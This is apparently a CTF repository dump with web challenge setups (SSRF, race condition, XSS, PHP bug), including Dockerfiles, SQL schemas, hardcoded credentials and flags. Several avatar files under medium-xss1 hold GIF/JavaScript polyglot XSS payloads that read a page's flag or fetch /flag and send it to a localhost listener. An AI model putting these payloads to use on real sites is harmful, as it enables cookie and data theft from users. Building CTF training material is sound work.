--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/hard-ssrf1/cgi-edge/public_html/test.html:
--------------------------------------------------------------------------------
1 |
hello!
2 | world
3 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM linode/lamp
2 |
3 | MAINTAINER Execut3
4 |
5 | RUN apt-get update; apt-get install php5-mysql git -y
6 |
7 | ADD html /var/www/html
8 | ADD data/db /db
9 | ADD start.sh /start.sh
10 | ADD apache /etc/apache2/sites-enabled
11 | CMD ["bash", "/start.sh"]
12 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/apache/000-default.conf:
--------------------------------------------------------------------------------
1 |
2 | DocumentRoot /var/www/html
3 |
4 | Options Indexes
5 | Require all granted
6 |
7 | ErrorLog ${APACHE_LOG_DIR}/error.log
8 | CustomLog ${APACHE_LOG_DIR}/access.log combined
9 |
10 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/data/data:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/data/data
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/data/db/board:
--------------------------------------------------------------------------------
1 | create table board (
2 | id integer not null primary key auto_increment,
3 | author text,
4 | content text
5 | );
6 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/data/db/data:
--------------------------------------------------------------------------------
1 | create table data (
2 | id integer not null primary key auto_increment,
3 | owner_id integer,
4 | data_name text,
5 | data_content text
6 | );
7 |
8 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/data/db/flag:
--------------------------------------------------------------------------------
1 | create table flag (flag text);
2 | insert into flag values ('flag_6d39cacfac640042eb39113aacaa7493');
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/data/db/log:
--------------------------------------------------------------------------------
1 | create table log (
2 | id integer not null primary key auto_increment,
3 | content text
4 | );
5 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/data/db/users:
--------------------------------------------------------------------------------
1 | create table users (
2 | id integer not null primary key auto_increment,
3 | username text,
4 | password text
5 | );
6 | insert into users values (null, 'admin', 'c3623b470852f6d889a9d3af7214becc'); -- somethingstrange
7 | insert into users values (null, 'reza', '5d41402abc4b2a76b9719d911017c592'); -- hello
8 |
9 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-race1/README.md:
--------------------------------------------------------------------------------
1 | # Initiate:
2 | ```bash
3 | docker run -it -p 10000:80 -v "$(pwd)":/var/www/site ctf/race1 bash
4 | service mysql start
5 | service apache2 start
6 | ```
7 | visit setup.php, then corrupt setup.php that nobody can interact with it,
8 | and remove the flag section from the bottom of it.
9 | test a user register and login and done...
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-race1/app/fonts/glyphicons-halflings-regular.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-race1/app/fonts/glyphicons-halflings-regular.eot
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-race1/app/fonts/glyphicons-halflings-regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-race1/app/fonts/glyphicons-halflings-regular.ttf
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-race1/app/fonts/glyphicons-halflings-regular.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-race1/app/fonts/glyphicons-halflings-regular.woff
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-race1/app/fonts/glyphicons-halflings-regular.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-race1/app/fonts/glyphicons-halflings-regular.woff2
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-race1/app/robots.txt:
--------------------------------------------------------------------------------
1 | User-agent: *
2 |
3 | Disallow: /flag.php
4 | Disallow: /setup.php
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-race1/app/test/test.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-race1/app/test/test.zip
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-race1/app/test/test1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-race1/app/test/test1
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-race1/app/test/test1.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-race1/app/test/test1.zip
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-race1/scripts/init.sql:
--------------------------------------------------------------------------------
1 | CREATE DATABASE IF NOT EXISTS `race1` CHARACTER SET UTF8;
2 |
3 | CREATE USER race1@localhost IDENTIFIED BY 'race1@mysqlTYUVNM';
4 |
5 | GRANT ALL PRIVILEGES ON race1.* TO race1@localhost;
6 |
7 | FLUSH PRIVILEGES;
8 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/init.sh:
--------------------------------------------------------------------------------
1 | python manage.py collectstatic --noinput
2 | python manage.py makemigrations
3 | python manage.py migrate
4 | python manage.py initate_database
5 | python manage.py runserver 0.0.0.0:8000
6 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/nginx/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM nginx/latest
2 | RUN rm /etc/nginx/sites-enabled/default
3 | ADD sites-enabled/ /etc/nginx/sites-enabled
4 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/scripts/init.sql:
--------------------------------------------------------------------------------
1 | CREATE DATABASE IF NOT EXISTS `xss1` CHARACTER SET UTF8;
2 |
3 | CREATE USER xss1_user@localhost IDENTIFIED BY 'xss1_user@pass';
4 |
5 | GRANT ALL PRIVILEGES ON xss1.* TO xss1_user@localhost;
6 |
7 | FLUSH PRIVILEGES;
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/scripts/run.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | service mysql start
3 | service nginx start
4 | cd /app && gunicorn website.wsgi --bind 0.0.0.0:8000 &
5 | while true; do
6 | python /app/manage.py check_profiles
7 | sleep 1
8 | done
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/.idea/markdown-exported-files.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/.idea/markdown-navigator/profiles_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/Dockerfile:
--------------------------------------------------------------------------------
1 | # Dockerfile
2 | FROM python:2.7
3 | WORKDIR /website
4 | COPY . .
5 | COPY manage.py requirements.txt /app/
6 | RUN pip install -r requirements.txt
7 | EXPOSE 8000
8 | #CMD ["python", "manage.py", "runserver", "0.0.0.0:8000"]
9 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/__init__.py
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/app_settings.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | from django.conf import settings
3 |
4 |
5 | ADMIN_USERNAME = getattr(settings, 'ADMIN_USERNAME', 'admin')
6 | ADMIN_PASSWORD = getattr(settings, 'ADMIN_PASSWORD', 'RRLgahscjbvARWVF')
7 | BASE_URL = getattr(settings, 'BASE_URL', 'http://127.0.0.1:8000')
8 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/apps.py:
--------------------------------------------------------------------------------
1 | from django.apps import AppConfig
2 |
3 |
4 | class AppConfig(AppConfig):
5 | name = 'app'
6 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/management/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/management/__init__.py
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/management/commands/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/management/commands/__init__.py
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/migrations/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/migrations/__init__.py
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.eot_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.eot_
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.eot_v=4.3.0:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.eot_v=4.3.0
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.ttf_v=4.3.0:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.ttf_v=4.3.0
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.woff2_v=4.3.0:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.woff2_v=4.3.0
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.woff_v=4.3.0:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/font-awesome/fonts/fontawesome-webfont.woff_v=4.3.0
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/IRANSans-Bold-web.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/IRANSans-Bold-web.ttf
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/IRANSans-Bold-web.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/IRANSans-Bold-web.woff
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/IRANSans-Light-web.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/IRANSans-Light-web.ttf
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/IRANSans-Light-web.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/IRANSans-Light-web.woff
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.eot
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.eot_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.eot_
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.ttf
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.woff
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/fonts/glyphicons-halflings-regular.woff2
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/img/no-menn.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/static/app/img/no-menn.png
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/templatetags/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/app/templatetags/__init__.py
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/templatetags/app_tags.py:
--------------------------------------------------------------------------------
1 | from django import template
2 |
3 | register = template.Library()
4 |
5 |
6 | @register.filter(name='addclass')
7 | def addclass(value, arg):
8 | return value.as_widget(attrs={'class': arg})
9 |
10 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/app/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/avatar/test.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/avatar/test.jpg
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/empty.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/empty.jpg
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test.gif:
--------------------------------------------------------------------------------
1 | GIF89a/*.......*/=0;var a=2; alert(a);
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test.js:
--------------------------------------------------------------------------------
1 | GIF89a/*.......*/=0;var a=2; alert(a);
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test.py:
--------------------------------------------------------------------------------
1 | print('here')
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_0GWwxOT.gif:
--------------------------------------------------------------------------------
1 | GIF89a/*.......*/=0;var flag = document.getElementById('flag').textContent;
2 | document.location = 'http://localhost:8001/' + flag;
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_7zFsDhg.gif:
--------------------------------------------------------------------------------
1 | GIF89a/*.......*/=0;var flag = document.getElementById('flag').textContent;
2 | document.location = 'http://localhost:8001/' + flag;
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_APyOfLm.gif:
--------------------------------------------------------------------------------
1 | GIF89a/*.......*/=0;document.location="http://localhost:8001/fdsfdsfdsfdfds"
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_B80PliW.gif:
--------------------------------------------------------------------------------
1 | GIF89a/*.......*/=0;var a=2; alert(a);
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_BfFj8MW.gif:
--------------------------------------------------------------------------------
1 | GIF89a/*.......*/=0;var xhr = new XMLHttpRequest();
2 | xhr.open('GET', '/flag');
3 | xhr.onload = function() {
4 | if (xhr.status === 200) {
5 | document.location = xhr.responseText;
6 | }
7 | };
8 | xhr.send();
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_NeifzZ3.gif:
--------------------------------------------------------------------------------
1 | GIF89a/*.......*/=0;var a=2; alert(a);
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_Z8O46N0.gif:
--------------------------------------------------------------------------------
1 | GIF89a/*.......*/=0;var xhr = new XMLHttpRequest();
2 | xhr.open('GET', '/flag');
3 | xhr.onload = function() {
4 | if (xhr.status === 200) {
5 | document.location = xhr.responseText;
6 | }
7 | };
8 | xhr.send();
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_c9sWenV.gif:
--------------------------------------------------------------------------------
1 | GIF89a/*.......*/=0;document.location="http://localhost:8001/fdsfdsfdsfdfds";
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_fjTRkgM.js:
--------------------------------------------------------------------------------
1 | GIF89a/*.......*/=0;var a=2; alert(a);
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_nAAq7iu.gif:
--------------------------------------------------------------------------------
1 | GIF89a/*.......*/=0;
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_osvKkTn.gif:
--------------------------------------------------------------------------------
1 | GIF89a/*.......*/=0;
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/media/avatar/test_vrikRjT.gif:
--------------------------------------------------------------------------------
1 | GIF89a/*.......*/=0;var a=2; alert(a);
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/requirements.txt:
--------------------------------------------------------------------------------
1 | Django==1.11
2 | django-csp==3.3
3 | django-ranged-response==0.2.0
4 | django-simple-captcha==0.5.6
5 | MySQL-python==1.2.5
6 | Pillow==5.0.0
7 | pytz==2017.3
8 | selenium==3.8.1
9 | six==1.11.0
10 | gunicorn
11 | requests
12 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/fonts/README.txt:
--------------------------------------------------------------------------------
1 | Roboto webfont source: https://www.google.com/fonts/specimen/Roboto
2 | Weights used in this project: Light (300), Regular (400), Bold (700)
3 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/fonts/Roboto-Bold-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/fonts/Roboto-Bold-webfont.woff
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/fonts/Roboto-Light-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/fonts/Roboto-Light-webfont.woff
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/fonts/Roboto-Regular-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/fonts/Roboto-Regular-webfont.woff
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/img/tooltag-arrowright.svg:
--------------------------------------------------------------------------------
1 |
4 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/admin/js/cancel.js:
--------------------------------------------------------------------------------
1 | (function($) {
2 | 'use strict';
3 | $(function() {
4 | $('.cancel-link').click(function(e) {
5 | e.preventDefault();
6 | window.history.back();
7 | });
8 | });
9 | })(django.jQuery);
10 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.eot_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.eot_
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.eot_v=4.3.0:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.eot_v=4.3.0
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.ttf_v=4.3.0:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.ttf_v=4.3.0
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.woff2_v=4.3.0:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.woff2_v=4.3.0
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.woff_v=4.3.0:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/font-awesome/fonts/fontawesome-webfont.woff_v=4.3.0
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/IRANSans-Bold-web.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/IRANSans-Bold-web.ttf
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/IRANSans-Bold-web.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/IRANSans-Bold-web.woff
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/IRANSans-Light-web.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/IRANSans-Light-web.ttf
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/IRANSans-Light-web.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/IRANSans-Light-web.woff
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.eot
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.eot_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.eot_
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.ttf
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.woff
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/fonts/glyphicons-halflings-regular.woff2
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/img/no-menn.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/static/app/img/no-menn.png
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/medium-xss1/website/website/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/medium-xss1/website/website/__init__.py
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/supereasy-phpbug1/README.md:
--------------------------------------------------------------------------------
1 | # PhpBug!
2 |
3 | ## level: **supereasy**
4 |
5 | Easy Apache related challenge.
6 |
7 | to run challenge do this:
8 |
9 | ```docker
10 | docker build -t phpbug1 .
11 | docker run -d -p 8000:80 phpbug1
12 | ```
13 |
14 | and access challenge through browser with this address: ```http://localhost:8000```
15 |
--------------------------------------------------------------------------------
/Challenges/BinaryCodes/Web/supereasy-phpbug1/app/source.php:
--------------------------------------------------------------------------------
1 | 999999)
6 | echo "flag_XXX";
7 | }
8 | }
9 | }
10 | ?>
11 |
--------------------------------------------------------------------------------
